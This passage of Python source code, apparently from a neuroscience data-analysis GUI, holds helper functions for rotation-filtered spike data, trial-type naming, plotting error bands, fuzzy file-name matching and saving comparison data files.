    :param t0: the time offset into the stimuli phase
    :return: tuple of the rotation filter object and the direction-grouped filter
             indices (or (None, None) if the filtering failed)
    '''

    from analysis_guis.dialogs.rotation_filter import RotationFilteredData

    # parameters (both directions are mandatory for the CW/CCW split)
    rot_filt['t_freq_dir'] = ['-1', '1']

    # splits the data by the forward/reverse directions
    r_obj = RotationFilteredData(data, rot_filt, cell_id, plot_exp_name, plot_all_expt, plot_scope, True,
                                 t_ofs=t0, t_phase=dt)
    if not r_obj.is_ok:
        # the filtering failed, so return None values
        return None, None

    # shortens the stimuli phases to the last/first dt of the baseline/stimuli phases
    # (n_filt halves because each direction pair collapses into one filter;
    #  t_phase is currently unused beyond this line)
    t_phase, n_filt = r_obj.t_phase[0][0], int(r_obj.n_filt / 2)
    ind_type = [np.where([tt in r_filt['t_freq_dir'] for r_filt in
                          r_obj.rot_filt_tot])[0] for tt in rot_filt['t_freq_dir']]

    # reduces down the fields to account for the manditory direction filtering
    r_obj.t_phase = [[dt] * len(x) for x in r_obj.t_phase]
    r_obj.phase_lbl = ['Baseline', 'Clockwise', 'Counter-Clockwise']
    r_obj.lg_str = [x.replace('Reverse\n', '') for x in r_obj.lg_str[:n_filt]]
    r_obj.i_expt, r_obj.ch_id, r_obj.cl_id = r_obj.i_expt[:n_filt], r_obj.ch_id[:n_filt], r_obj.cl_id[:n_filt]

    # # loops through each stimuli direction (CW/CCW) and for each filter reducing the stimuli phases
    # for i_dir in range(len(rot_filt['t_freq_dir'])):
    #     for i_filt in range(n_filt):
    #
    #         # for each cell (in each phase) reduce the spikes to fit the shortened stimuli range
    #         ii = ind_type[i_dir][i_filt]
    #         for i_cell in range(np.size(r_obj.t_spike[ii], axis=0)):
    #             for i_trial in range(np.size(r_obj.t_spike[ii], axis=1)):
    #                 for i_phase in range(np.size(r_obj.t_spike[ii], axis=2)):
    #                     # reduces the spikes by the shortened stimuli phase depending on the phase
    #                     if r_obj.t_spike[ii][i_cell, i_trial, i_phase] is not None:
    #                         x = dcopy(r_obj.t_spike[ii][i_cell, i_trial, i_phase])
    #                         if i_phase == 0:
    #                             # case is the baseline phase
    #                             r_obj.t_spike[ii][i_cell, i_trial, i_phase] = x[x > (t_phase - dt)]
    #                         else:
    #                             # case is the stimuli phase
    #                             jj = np.logical_and(x >= t0, x < (t0 + dt))
    #                             r_obj.t_spike[ii][i_cell, i_trial, i_phase] = x[jj]

    # returns the rotational analysis object
    return r_obj, ind_type
def eval_class_func(funcName, *args):
    '''
    Evaluates the given callable with the supplied positional arguments.

    :param funcName: the callable being evaluated
    :param args: the positional arguments passed to the callable
    :return: the callable's return value
    '''

    # forwards the arguments directly to the callable
    result = funcName(*args)
    return result
def set_box_color(bp, color):
    '''
    Sets a uniform colour over all the line components of a boxplot.

    :param bp: the boxplot component dictionary
    :param color: the new component colour
    :return:
    '''

    # recolours each of the boxplot line component groups
    for bp_key in ('boxes', 'whiskers', 'caps', 'medians'):
        plt.setp(bp[bp_key], color=color)
def cond_abb(tt):
    '''
    Returns the abbreviation for the given trial condition type.

    :param tt: the trial condition type string
    :return: the condition abbreviation string
    '''

    # maps the (canonical, lower-cased) trial condition types to their abbreviations
    abb_txt = {
        'black': 'B',
        'uniform': 'U',
        'motordrifting': 'MD',
        'uniformdrifting': 'UD',
        'landmarkleft': 'LL',
        'landmarkright': 'LR',
        'black40': 'B40',
        'black45': 'B45',
        'mismatch1': 'MM1',
        'mismatch2': 'MM2',
        'mismatchvert': 'MMV',
        'black_discard': 'BD',
    }

    # normalises the condition name before the lookup
    tt_norm = convert_trial_type(tt).lower()
    return abb_txt[tt_norm]
def convert_trial_type(tt_str):
    '''
    Maps known alias spellings of a trial-type name onto the canonical name.

    :param tt_str: raw trial type string
    :return: canonical trial type name (tt_str unchanged when unrecognised)
    '''

    # canonical name -> alias spellings seen in experiment files
    tt_key = {
        'Black40': ['Black_40', 'Black40deg'],
        'Black45': ['Black_45', 'Black45deg'],
        'Mismatch1': ['mismatch1', 'Mismatch-o'],
        'Mismatch2': ['mismatch2'],
        'MismatchVert': ['mismatch-vert', 'mismatch-up', 'Mismatch-vert'],
        'Black_Discard': ['Black_discard', 'Black-discard', 'Black1_Discard']
    }

    # inverts the table to alias -> canonical and looks the string up,
    # falling back on the original string when no alias matches
    alias_to_canon = {alias: canon for canon, aliases in tt_key.items() for alias in aliases}
    return alias_to_canon.get(tt_str, tt_str)
def pad_array_with_nans(y, n_row=0, n_col=0):
    '''
    Pads a 2D array with trailing rows and/or columns of NaNs.

    :param y: 2D array-like to be padded (the input is not modified)
    :param n_row: number of NaN rows appended below the array
    :param n_col: number of NaN columns appended to the right of the array
    :return: new padded numpy array
    '''

    # creates an independent copy of the array (the caller's data is untouched)
    yy = np.array(y, copy=True)

    # expands the rows (if required)
    # np.pad replaces the deprecated np.lib.pad alias, and np.nan replaces
    # np.NaN (which was removed in NumPy 2.0)
    if n_row > 0:
        yy = np.pad(yy, ((0, n_row), (0, 0)), 'constant', constant_values=np.nan)

    # expands the columns (if required)
    if n_col > 0:
        yy = np.pad(yy, ((0, 0), (0, n_col)), 'constant', constant_values=np.nan)

    # returns the final array
    return yy
def calc_pointwise_diff(x1, x2):
    '''
    Computes the matrix of absolute pairwise differences between two vectors.

    :param x1: first value vector (varies along the columns of the result)
    :param x2: second value vector (varies along the rows of the result)
    :return: array D of shape (len(x2), len(x1)) with D[i, j] = |x1[j] - x2[i]|
    '''

    # broadcasting replaces the meshgrid construction; the layout is identical
    # to np.abs(X1 - X2) with X1, X2 = np.meshgrid(x1, x2)
    return np.abs(np.asarray(x1)[None, :] - np.asarray(x2)[:, None])
def check_existing_file(hParent, out_file):
    '''
    Checks whether a file may be written, asking the user about overwrites.

    :param hParent: parent widget for the confirmation dialog
    :param out_file: path of the file about to be written
    :return: True when the file does not exist or the user accepts the
             overwrite, False otherwise
    '''

    # file doesn't exist so continue as normal
    if not os.path.exists(out_file):
        return True

    # prompts the user if they want to remove the selected item(s)
    u_choice = QMessageBox.question(hParent, 'Overwrite Existing File?',
                                    "File already exists. Are you sure you wish to overwrite this file?",
                                    QMessageBox.Yes | QMessageBox.No, QMessageBox.No)

    # returns if user wants to overwrite this file
    return u_choice == QMessageBox.Yes
def setup_sns_plot_dict(**kwargs):
    '''
    Collects the seaborn plot keyword arguments into a plain dictionary.

    :param kwargs: arbitrary plot properties
    :return: new dict holding a copy of the supplied keyword arguments
    '''

    # dict(kwargs) replaces the manual key-by-key copy loop; a new dict is
    # still returned so later caller mutation cannot affect this input
    return dict(kwargs)
def create_error_area_patch(ax, x, y_mn, y_err, col, f_alpha=0.2, y_err2=None, l_style='-', edge_color=None):
    '''
    Adds a shaded error-band polygon to the given axis.

    :param ax: matplotlib axis the patch is added to
    :param x: x-coordinates of the error band
    :param y_mn: mean trace (None => y_err/y_err2 are treated as absolute bounds)
    :param y_err: upper error offset (or upper bound when y_mn is None)
    :param col: face colour of the patch
    :param f_alpha: face alpha transparency
    :param y_err2: separate lower error offset/bound (None => symmetric band)
    :param l_style: patch edge line style
    :param edge_color: patch edge colour (None => same as the face colour)
    :return: None (the polygon is added to ax in place)
    '''

    # removes the non-NaN values
    is_ok = ~np.isnan(y_err)
    y_err, x = dcopy(y_err)[is_ok], np.array(dcopy(x))[is_ok]
    if edge_color is None:
        edge_color = col

    # reduces the mean trace to the valid points (if provided)
    if y_mn is not None:
        y_mn = dcopy(y_mn)[is_ok]

    # sets up the error patch vertices (all y-values are clamped at zero)
    if y_err2 is None:
        if y_mn is None:
            # NOTE(review): with y_mn=None and y_err2=None both polygon edges
            # trace y_err, giving a zero-height band - confirm intended
            err_vert = [*zip(x, np.maximum(0, y_err)), *zip(x[::-1], np.maximum(0, y_err[::-1]))]
        else:
            err_vert = [*zip(x, np.maximum(0, y_mn + y_err)), *zip(x[::-1], np.maximum(0, y_mn[::-1] - y_err[::-1]))]
    else:
        # removes the non-NaN values
        y_err2 = dcopy(y_err2)[is_ok]
        if y_mn is None:
            err_vert = [*zip(x, np.maximum(0, y_err)), *zip(x[::-1], np.maximum(0, y_err2[::-1]))]
        else:
            err_vert = [*zip(x, np.maximum(0, y_mn + y_err)), *zip(x[::-1], np.maximum(0, y_mn[::-1] - y_err2[::-1]))]

    # creates the polygon object and adds it to the axis
    poly = Polygon(err_vert, facecolor=col, alpha=f_alpha, edgecolor=edge_color, linewidth=3, linestyle=l_style)
    ax.add_patch(poly)
def create_step_area_patch(ax, x, y_mn, y_err, col, f_alpha=0.2):
    '''
    Adds a step-shaped (histogram-style) error-band polygon to the axis.

    :param ax: matplotlib axis the patch is added to
    :param x: bin-centre x-coordinates (assumed uniformly spaced)
    :param y_mn: mean values for each bin
    :param y_err: symmetric error offsets for each bin
    :param col: face/edge colour of the patch
    :param f_alpha: face alpha transparency
    :return: None (the polygon is added to ax in place)
    '''

    # determines the new x-axis interpolation points (the bin edges, half a
    # bin-width either side of the centres; +0.001 guards the final edge)
    d_xi = x[1] - x[0]
    x_interp = np.arange(x[0] - d_xi / 2, x[-1] + (0.001 + d_xi / 2), d_xi)

    # sets the x-locations for each of the steps (each bin edge duplicated)
    ii = np.arange(len(x)).astype(int)
    x_step = x_interp[np.vstack((ii, ii+1)).T].flatten()

    # sets the lower/upper bound step values (each bin value duplicated so the
    # band is flat across each bin)
    jj = repmat(ii, 2, 1).T
    y_lo, y_hi = (y_mn[jj] - y_err[jj]).flatten(), (y_mn[jj] + y_err[jj]).flatten()

    # creates the polygon object and adds it to the axis
    step_vert = [*zip(x_step, y_lo), *zip(x_step[::-1], y_hi[::-1])]
    poly = Polygon(step_vert, facecolor=col, alpha=f_alpha, edgecolor=col, linewidth=4)
    ax.add_patch(poly)
def set_sns_colour_palette(type='Default'):
    '''
    Applies the application's seaborn colour palette.

    :param type: palette name; only 'Default' is currently recognised (any
                 other value leaves the active palette untouched)
    :return: None
    '''

    if type == 'Default':
        colors = sns.xkcd_palette(["dark slate blue", "dark peach", "dull teal", "purpley grey", "maize", "sea blue",
                    "dark salmon", "teal", "dusty lavender", "sandy", "turquoise blue", "terracota", "dark seafoam",
                    "dark lilac", "buff"])

        # updates the colour palette
        sns.set_palette(colors)
def det_closest_file_match(f_grp, f_new, use_ratio=False):
    '''
    Determines the file name within a group that best matches a new name.

    :param f_grp: list of candidate file names
    :param f_new: file name being matched
    :param use_ratio: if True uses the full fuzzy ratio, otherwise the
                      partial (substring) ratio
    :return: tuple of (best matching name, match score out of 100)
    '''

    # first look for an exact (case-sensitive) match
    ind_m = next((i for i in range(len(f_grp)) if f_grp[i] == f_new), None)
    if ind_m is None:
        # determines the best match and returns the matching file name/score
        if use_ratio:
            f_score = np.array([fuzz.ratio(x.lower(), f_new.lower()) for x in f_grp])
        else:
            f_score = np.array([fuzz.partial_ratio(x.lower(), f_new.lower()) for x in f_grp])

        # sorts the scores/file names by descending score
        i_sort = np.argsort(-f_score)
        f_score, f_grp = f_score[i_sort], np.array(f_grp)[i_sort]

        # returns the top matching values
        return f_grp[0], f_score[0]
    else:
        # otherwise, return the exact match
        return f_grp[ind_m], 100.
def get_cfig_line(cfig_file, fld_name):
    '''
    Retrieves the value of a named field from a "|"-delimited config file.

    :param cfig_file: path to the configuration file
    :param fld_name: name of the field being searched for
    :return: text after the first "|" on the first line containing fld_name
             (StopIteration is raised when the field is absent)
    '''

    # the original implementation leaked the file handle (open() was called
    # inside a generator expression and never closed); the context manager
    # guarantees closure
    with open(cfig_file) as fp:
        return next(c.rstrip('\n').split('|')[1] for c in fp if fld_name in c)
def save_single_file(f_name, data):
    '''
    Serialises a single data object to file.

    :param f_name: output file path
    :param data: picklable object to be written
    :return: None
    '''

    # NOTE(review): 'p' is presumably the module-level pickle alias - confirm
    with open(f_name, 'wb') as fw:
        p.dump(data, fw)
def save_multi_comp_file(main_obj, out_info, force_update=False):
    '''
    Starts a worker thread that writes a multi-comparison (.mcomp) data file.

    :param main_obj: main GUI object (supplies the data and worker threads)
    :param out_info: dict with 'inputDir' and 'dataName' output fields
    :param force_update: if True, skips the overwrite-confirmation prompt
    :return: None (returns early when the user declines an overwrite)
    '''

    # sets the output file name
    out_file = os.path.join(out_info['inputDir'], '{0}.mcomp'.format(out_info['dataName']))
    if not force_update:
        if not check_existing_file(main_obj, out_file):
            # if the file does exists and the user doesn't want to overwrite then exit
            return

    # starts the worker thread that performs the actual file output
    iw = main_obj.det_avail_thread_worker()
    main_obj.worker[iw].set_worker_func_type('save_multi_comp_file', thread_job_para=[main_obj.data, out_info])
    main_obj.worker[iw].start()
def save_single_comp_file(main_obj, out_info, force_update=False):
    '''
    Writes a single-experiment comparison (.ccomp) data file.

    :param main_obj: main GUI object (supplies the data)
    :param out_info: dict with 'inputDir', 'dataName' and 'exptName' fields
    :param force_update: if True, skips the overwrite-confirmation prompt
    :return: None (returns early when the user declines an overwrite)
    '''

    # sets the output file name
    out_file = os.path.join(out_info['inputDir'], '{0}.ccomp'.format(out_info['dataName']))
    if not force_update:
        if not check_existing_file(main_obj, out_file):
            # if the file does exists and the user doesn't want to overwrite then exit
            return

    # retrieves the index of the data field corresponding to the current experiment
    i_comp = det_comp_dataset_index(main_obj.data.comp.data, out_info['exptName'])

    # creates the multi-experiment data file based on the type
    data_out = {'data': [[] for _ in range(2)], 'c_data': main_obj.data.comp.data[i_comp],
                'ex_data': None, 'gen_filt': main_obj.data.exc_gen_filt}
    data_out['data'][0], data_out['data'][1] = get_comp_datasets(main_obj.data, c_data=data_out['c_data'], is_full=True)

    # outputs the external data (if it exists)
    if hasattr(main_obj.data, 'externd'):
        if hasattr(main_obj.data.externd, 'free_data'):
            data_out['ex_data'] = main_obj.data.externd.free_data

    # outputs the data to file
    with open(out_file, 'wb') as fw:
        p.dump(data_out, fw)
def save_multi_data_file(main_obj, out_info, is_multi=True, force_update=False):
    '''
    Starts a worker thread that writes a multi-experiment data file.

    :param main_obj: main GUI object (supplies the data and worker threads)
    :param out_info: dict with 'inputDir' and 'dataName' output fields
    :param is_multi: selects the '.mdata' extension (True) or '.mcomp' (False)
    :param force_update: if True, skips the overwrite-confirmation prompt
    :return: None (returns early when the user declines an overwrite)
    '''

    # initialisations
    f_extn = 'mdata' if is_multi else 'mcomp'

    # determines if the file exists
    out_file = os.path.join(out_info['inputDir'], '{0}.{1}'.format(out_info['dataName'], f_extn))
    if not force_update:
        if not check_existing_file(main_obj, out_file):
            # if the file does exists and the user doesn't want to overwrite then exit
            return

    # starts the worker thread that performs the actual file output
    iw = main_obj.det_avail_thread_worker()
    main_obj.worker[iw].set_worker_func_type('save_multi_expt_file', thread_job_para=[main_obj.data, out_info])
    main_obj.worker[iw].start()
def det_comp_dataset_index(c_data, exp_name, is_fix=True):
    '''
    Determines the comparison dataset whose fixed/free experiment file name
    matches the given experiment name.

    :param c_data: list of comparison dataset objects
    :param exp_name: experiment name to match ("a/b" forms are reduced to "a")
    :param is_fix: match against the fixed (True) or free (False) file names
    :return: matching dataset index (None when no likely match exists)
    '''

    # removes any forward slashes (if present)
    if '/' in exp_name:
        exp_name = exp_name.split('/')[0]

    # collects the relevant file names, then defers to the fuzzy matcher
    if is_fix:
        f_name = [cd.fix_name for cd in c_data]
    else:
        f_name = [cd.free_name for cd in c_data]
    return det_likely_filename_match(f_name, exp_name)
def det_likely_filename_match(f_name, exp_name):
    '''
    Determines which file name most likely corresponds to an experiment name.

    :param f_name: list of candidate file names
    :param exp_name: experiment name (or list whose first entry is used)
    :return: index of the matching file name, or None when nothing scores
             above the fuzzy-match threshold
    '''

    # sets the search name
    exp_name_search = exp_name[0] if isinstance(exp_name, list) else exp_name

    # determines the comparison dataset with the matching freely moving experiment file name
    i_expt_nw = next((i for i, x in enumerate(f_name) if x.lower() == exp_name_search.lower()), None)
    if i_expt_nw is None:
        # if there isn't an exact match, then determine the candidates whose
        # partial fuzzy-match score exceeds the threshold
        m_score_fuzz = np.array([fuzz.partial_ratio(x, exp_name_search) for x in f_name])
        i_match_fuzz = np.where(m_score_fuzz > 90)[0]

        # resolves the candidate set down to a single index
        if len(i_match_fuzz) == 0:
            # case is there are no matches
            return None
        elif len(i_match_fuzz) > 1:
            # case is there is more than one match - break the tie using the
            # product of the partial and full fuzzy scores
            m_score_fuzz_2 = np.array([fuzz.ratio(x, exp_name_search) for x in f_name])
            i_expt_nw = np.argmax(np.multiply(m_score_fuzz, m_score_fuzz_2))
        else:
            # case is there is only one match
            i_expt_nw = i_match_fuzz[0]

    # returns the index of the matching file
    return i_expt_nw
def get_comp_datasets(data, c_data=None, ind=None, is_full=False):
    '''
    Retrieves the fixed and free cluster datasets for a comparison.

    :param data: main data object (holds .cluster and ._cluster lists)
    :param c_data: comparison dataset object (used when ind is None)
    :param ind: optional explicit (fixed, free) index pair into the clusters
    :param is_full: if True, use the raw cluster list even when a filtered
                    list is available
    :return: tuple of (fixed dataset, free dataset)
    '''

    # sets the cluster type (raw vs filtered cluster list)
    if use_raw_clust(data):
        c = data._cluster
    else:
        c = data._cluster if is_full else data.cluster

    # retrieves the fixed/free datasets based on type
    if ind is None:
        # look up each dataset by its experiment file name
        return c[get_expt_index(c_data.fix_name, c)], c[get_expt_index(c_data.free_name, c)]
    else:
        # indices were supplied directly
        return c[ind[0]], c[ind[1]]
def get_comb_file_names(str_1, str_2):
    '''
    Combines two file names into "str_1/<unshared tail of str_2>" based on
    their common (case-insensitive) prefix.

    :param str_1: first file name (kept in full)
    :param str_2: second file name (only its differing tail is appended)
    :return: combined "str_1/tail" string
    '''

    # initialisations
    n_cmp = min(len(str_1), len(str_2))
    lo_1, lo_2 = str_1.lower(), str_2.lower()

    # locates the last character of the shared prefix (n_cmp when the first
    # n_cmp characters all agree); a first-character mismatch yields -1, which
    # slices only the final character of str_2 (behaviour kept as-is)
    i_match = n_cmp
    for i in range(n_cmp):
        if lo_1[i] != lo_2[i]:
            i_match = i - 1
            break

    return '{0}/{1}'.format(str_1, str_2[i_match:])
def use_raw_clust(data):
    '''
    Determines whether the raw (unfiltered) cluster data must be used.

    :param data: main data object holding .cluster and ._cluster
    :return: True when no filtered clusters exist, or when the filtered and
             raw cluster counts differ
    '''

    if data.cluster is None:
        # no filtered cluster data has been set up yet
        return True

    # filtered data exists, so fall back to raw only on a count mismatch
    return len(data.cluster) != len(data._cluster)
def get_global_expt_index(data, c_data):
    '''
    Returns the index, within the raw cluster list, of the experiment whose
    file name matches the comparison dataset's fixed experiment name.

    :param data: main data object (uses data._cluster)
    :param c_data: comparison dataset object (uses c_data.fix_name)
    :return: integer index (raises ValueError when no file name matches)
    '''

    return [extract_file_name(c['expFile']) for c in data._cluster].index(c_data.fix_name)
def has_free_ctype(data):
    '''
    Determines whether freely-moving cell-type data is available.

    :param data: main data object (may carry an .externd.free_data field)
    :return: truthy when cell type info is set for at least one experiment,
             False otherwise
    '''

    # both the external data container and its free_data field must exist;
    # otherwise there is nothing to inspect
    if not hasattr(data, 'externd') or not hasattr(data.externd, 'free_data'):
        return False

    # cell type information must be set for at least one experiment
    return np.any([len(x) > 0 for x in data.externd.free_data.cell_type])
def det_matching_fix_free_cells(data, exp_name=None, cl_ind=None, apply_filter=False, r_obj=None):
    '''
    Maps each fixed-preparation cell onto its matching freely-moving cell.

    :param data: main data object
    :param exp_name: list of freely moving experiment names (None => use all
                     names in the external free-data field)
    :param cl_ind: pre-computed cluster index arrays (None => computed here)
    :param apply_filter: if True, cells excluded by the general filter are
                         marked as unmatched
    :param r_obj: optional rotation filter object further restricting cells
    :return: (i_expt, f2f_map); i_expt holds the comparison dataset index per
             file (-1 when no match was found) and f2f_map the per-file
             (n_cell x 2) fixed-to-free index mapping arrays (-1 = no match)
    '''

    import analysis_guis.calc_functions as cfcn
    from analysis_guis.dialogs.rotation_filter import RotationFilteredData

    # sets the experiment file names
    if exp_name is None:
        exp_name = data.externd.free_data.exp_name
    elif not isinstance(exp_name, list):
        # NOTE(review): list(exp_name) splits a plain string into characters -
        # [exp_name] may have been intended; confirm against callers
        exp_name = list(exp_name)

    # initialisations
    free_file, free_data = [x.free_name for x in data.comp.data], data.externd.free_data
    i_file_free = [free_data.exp_name.index(ex_name) for ex_name in exp_name]

    # retrieves the cluster indices (if not provided)
    if cl_ind is None:
        r_filt = init_rotation_filter_data(False)
        r_filt['t_type'] += ['Uniform']
        r_obj0 = RotationFilteredData(data, r_filt, None, None, True, 'Whole Experiment', False, use_raw=True)
        cl_ind = r_obj0.clust_ind[0]

    # memory allocation
    n_file = len(exp_name)
    is_ok = np.ones(n_file, dtype=bool)
    i_expt = -np.ones(n_file, dtype=int)
    f2f_map = np.empty(n_file, dtype=object)

    for i_file, ex_name in enumerate(exp_name):
        # determines if there is a match between the freely moving experiment file and that stored within the
        # freely moving data field
        if det_likely_filename_match(free_data.exp_name, ex_name) is None:
            # if not, then flag the file as being invalid and continue
            is_ok[i_file] = False
            continue
        else:
            # otherwise, determine if there is a match within the comparison dataset freely moving data files
            i_expt_nw = det_likely_filename_match(free_file, ex_name)
            if i_expt_nw is None:
                # if not, then flag the file as being invalid and continue
                is_ok[i_file] = False
                continue

        # retrieves the fixed/free datasets
        i_expt[i_file] = i_expt_nw
        c_data = data.comp.data[i_expt_nw]
        data_fix, data_free = get_comp_datasets(data, c_data=c_data, is_full=True)

        # sets the match array (removes non-inclusion cells and non-accepted matched cells)
        cl_ind_nw = cl_ind[i_expt_nw]
        i_match = c_data.i_match[cl_ind_nw]
        i_match[~c_data.is_accept[cl_ind_nw]] = -1

        # removes any cells that are excluded by the general filter
        if apply_filter:
            cl_inc_fix = cfcn.get_inclusion_filt_indices(data_fix, data.exc_gen_filt)
            i_match[np.logical_not(cl_inc_fix)] = -1

        # if there is a secondary rotation filter object, then remove any non-included indices
        if r_obj is not None:
            b_arr = set_binary_groups(len(i_match), r_obj.clust_ind[0][i_expt_nw])
            i_match[~b_arr] = -1

        # determines the overlapping cell indices between the free dataset and those from the cdata file
        _, i_cell_free_f, i_cell_free = \
            np.intersect1d(dcopy(free_data.cell_id[i_file_free[i_file]]), dcopy(data_free['clustID']),
                           assume_unique=True, return_indices=True)

        # determines the fixed-to-free mapping index arrays
        _, i_cell_fix, i_free_match = np.intersect1d(i_match, i_cell_free, return_indices=True)
        f2f_map[i_file] = -np.ones((len(cl_ind_nw),2), dtype=int)
        f2f_map[i_file][i_cell_fix, 0] = i_cell_free[i_free_match]
        f2f_map[i_file][i_cell_fix, 1] = i_cell_free_f[i_free_match]

    # returns the experiment index/fixed-to-free mapping indices
    return i_expt, f2f_map
def det_reverse_indices(i_cell_b, ind_gff):
    '''
    Determines where the values common to both arrays sit within ind_gff.

    :param i_cell_b: first index array
    :param ind_gff: second index array
    :return: indices into ind_gff of the elements shared with i_cell_b
    '''

    # np.intersect1d returns (common values, indices into arg 1, indices into
    # arg 2); only the indices into ind_gff are required here
    isect = np.intersect1d(i_cell_b, ind_gff, return_indices=True)
    return isect[2]
def reset_table_pos(fig, ax_t, t_props):
    '''
    Re-stacks multiple tables vertically within the table axis.

    :param fig: matplotlib figure object (must expose get_renderer())
    :param ax_t: axis hosting the tables
    :param t_props: list of table property tuples; element [0] is the table
                    artist (with a _bbox) and element [2] a height scale
    :return: None (table bounding boxes are modified in place)
    '''

    # no need to reset positions if only one table
    n_table = len(t_props)
    if n_table == 1:
        return

    # initialisations
    f_rend = fig.get_renderer()
    ax_pos = ax_t.get_tightbbox(f_rend).bounds
    ax_hght = ax_pos[1] + ax_pos[3]

    # current rendered bounds and bbox parameters of each table
    t_pos = [tp[0].get_tightbbox(f_rend).bounds for tp in t_props]
    t_pos_bb = [tp[0]._bbox for tp in t_props]

    # repositions every table after the first
    for i_table in range(1, n_table):
        # proportional height of this table's slot within the axis
        p_hght = 1 - i_table / n_table
        y_nw = (p_hght * ax_hght) - t_pos[i_table][3]

        # moves the table vertically to its slot and centres it horizontally
        # relative to the first table
        t_props[i_table][0]._bbox[1] = y_nw / t_props[i_table][2]
        t_props[i_table][0]._bbox[0] = t_pos_bb[0][0] + (t_pos_bb[0][2] - t_pos_bb[i_table][2]) / 2
def get_table_font_size(n_grp):
    '''
    Returns a table font object whose size shrinks as the group count grows.

    :param n_grp: number of groups shown in the table
    :return: font object (size 10 for <=2 groups, 8 for <=4, otherwise 6)
    '''

    # pick the point size from the group-count band, then build the font
    f_size = 10 if n_grp <= 2 else (8 if n_grp <= 4 else 6)
    return create_font_obj(size=f_size)
def get_cluster_id_flag(cl_id, i_expt=None):
    '''
    Encodes cluster IDs as globally unique values (expt_index * 10000 + ID).

    :param cl_id: list of per-experiment cluster ID arrays
    :param i_expt: optional explicit experiment indices (the enumeration
                   order is used when omitted)
    :return: list of arrays of globally unique cluster ID values
    '''

    if i_expt is None:
        # case is the experiment index is not provided
        return [np.array(ids) + 10000 * ix for ix, ids in enumerate(cl_id)]

    # case is the experiment index is provided
    return [ids + 10000 * ix for ix, ids in zip(i_expt, cl_id)]
def get_array_lengths(Y, fld_key=None):
    '''
    Returns per-element lengths, or the values of a keyed field, from Y.

    :param Y: iterable of sized containers (or of subscriptable records when
              fld_key is given)
    :param fld_key: optional key/field name to extract instead of the length
    :return: numpy array of lengths or of extracted field values
    '''

    if fld_key is None:
        return np.array([len(x) for x in Y])
    else:
        # direct subscripting replaces the original eval() string construction,
        # which was both slower and unsafe for arbitrary key strings
        return np.array([x[fld_key] for x in Y])
def get_global_index_arr(r_obj, return_all=True, i_expt_int=None):
    '''
    Retrieves per-filter global cell index arrays for the experiments common
    to all trial types.

    :param r_obj: rotation filter data object (uses .clust_ind and .i_expt0)
    :param return_all: if True, experiments outside the intersection appear
                       as empty lists; if False they are dropped entirely
    :param i_expt_int: optional pre-computed common experiment index set
    :return: NOTE(review): when i_expt_int is None a (index arrays, common
             experiment array) tuple is returned, otherwise only the index
             arrays - callers must handle both shapes; confirm intended
    '''

    def setup_global_index_arr(nC, i_expt_int, i_expt0, return_all):
        '''
        Builds the per-experiment global index ranges from cell counts.

        :param nC: per-experiment cell counts
        :param i_expt_int: experiment indices common to all trial types
        :param i_expt0: experiment index of each count entry
        :param return_all: keep empty placeholders for excluded experiments
        :return: list of global index arrays (or empty lists)
        '''

        # cumulative offsets: experiment i owns global indices ii[i]..ii[i+1]-1
        ii = np.append(0, np.cumsum(nC))
        if return_all:
            return [np.arange(ii[i], ii[i + 1]) if (i_expt0[i] in i_expt_int)
                                                and (ii[i + 1] - ii[i]) > 0 else [] for i in range(len(ii) - 1)]
        else:
            return [np.arange(ii[i], ii[i + 1]) for i in range(len(ii) - 1)
                                                if (i_expt0[i] in i_expt_int) and (ii[i + 1] - ii[i]) > 0]

    # determines the indices of the experiments that are common to all trial types
    if i_expt_int is None:
        i_expt_int = set(r_obj.i_expt0[0])
        for i_ex in r_obj.i_expt0[1:]:
            i_expt_int = i_expt_int.intersection(set(i_ex))

        # retrieves the global indices of the cells wrt to the filtered spiking frequency values
        return [setup_global_index_arr(get_array_lengths(cl_id), i_expt_int, i_ex, return_all)
                                    for cl_id, i_ex in zip(r_obj.clust_ind, r_obj.i_expt0)], np.array(list(i_expt_int))
    else:
        # retrieves the global indices of the cells wrt to the filtered spiking frequency values
        cl_id = [[x for i, x in zip(i_ex0, cl_id) if i in i_expt_int] for i_ex0, cl_id in
                                    zip(r_obj.i_expt0, r_obj.clust_ind)]
        return [setup_global_index_arr(get_array_lengths(_cl_id), i_expt_int, i_expt_int, return_all)
                                    for _cl_id in cl_id]
def reset_integer_tick(ax, ax_type):
    '''
    Removes non-integer tick values from one axis of a plot.

    :param ax: matplotlib axis object
    :param ax_type: 'x' for the x-axis, anything else for the y-axis
    :return: None (tick positions/labels are modified in place)
    '''

    # selects the getter/setter functions for the requested axis
    if ax_type == 'x':
        get_tick_fcn, set_tick_fcn, set_lbl_fcn = ax.get_xticks, ax.set_xticks, ax.set_xticklabels
    else:
        get_tick_fcn, set_tick_fcn, set_lbl_fcn = ax.get_yticks, ax.set_yticks, ax.set_yticklabels

    # retrieves the tick values and determines if they are integers
    t_vals = get_tick_fcn()
    is_ok = t_vals % 1 == 0

    # if there are any non-integer values then remove them
    if np.any(~is_ok):
        set_tick_fcn(t_vals[is_ok])
        # NOTE(review): set_*ticklabels is being fed Annotation objects rather
        # than plain strings - confirm this renders as intended
        set_lbl_fcn([Annotation('{:d}'.format(int(y)),[0, y]) for y in t_vals[is_ok]])
def get_all_filter_indices(data, rot_filt):
    '''
    Retrieves the cluster indices for all experiments after augmenting the
    rotation filter with the values excluded by the general filter.

    :param data: main data object
    :param rot_filt: rotation filter dict (modified in place with the
                     additional field values)
    :return: list of cluster index arrays (one per experiment)
    '''

    # module import
    from analysis_guis.dialogs.rotation_filter import RotationFilteredData

    # retrieves the data clusters for each of the valid rotation experiments
    is_rot_expt = det_valid_rotation_expt(data)
    d_clust = [x for x, y in zip(data._cluster, is_rot_expt) if y]
    wfm_para = [x['rotInfo']['wfm_para']['UniformDrifting'] for x in
                            d_clust if 'UniformDrifting' in x['rotInfo']['wfm_para']]

    # adds any non-empty filter objects onto the rotation filter object
    for gf in data.exc_gen_filt:
        if len(data.exc_gen_filt[gf]):
            # retrieves the field values
            if gf in ['cell_type']:
                # case is the freely moving data types
                fld_vals = get_unique_group_types(d_clust, gf, c_type=data.externd.free_data.cell_type)

            elif gf in ['temp_freq', 'temp_freq_dir', 'temp_cycle']:
                # case is the uniform drifting data types
                fld_vals = get_unique_group_types(d_clust, gf, wfm_para=wfm_para)

            else:
                # case is the other rotation data types
                fld_vals = get_unique_group_types(d_clust, gf)

            # retrieves the fields values to be added (those not excluded)
            add_fld = list(set(fld_vals) - set(data.exc_gen_filt[gf]))
            if 'All' in rot_filt[gf]:
                rot_filt[gf] = add_fld
            else:
                rot_filt[gf] = list(np.union1d(add_fld, rot_filt[gf]))

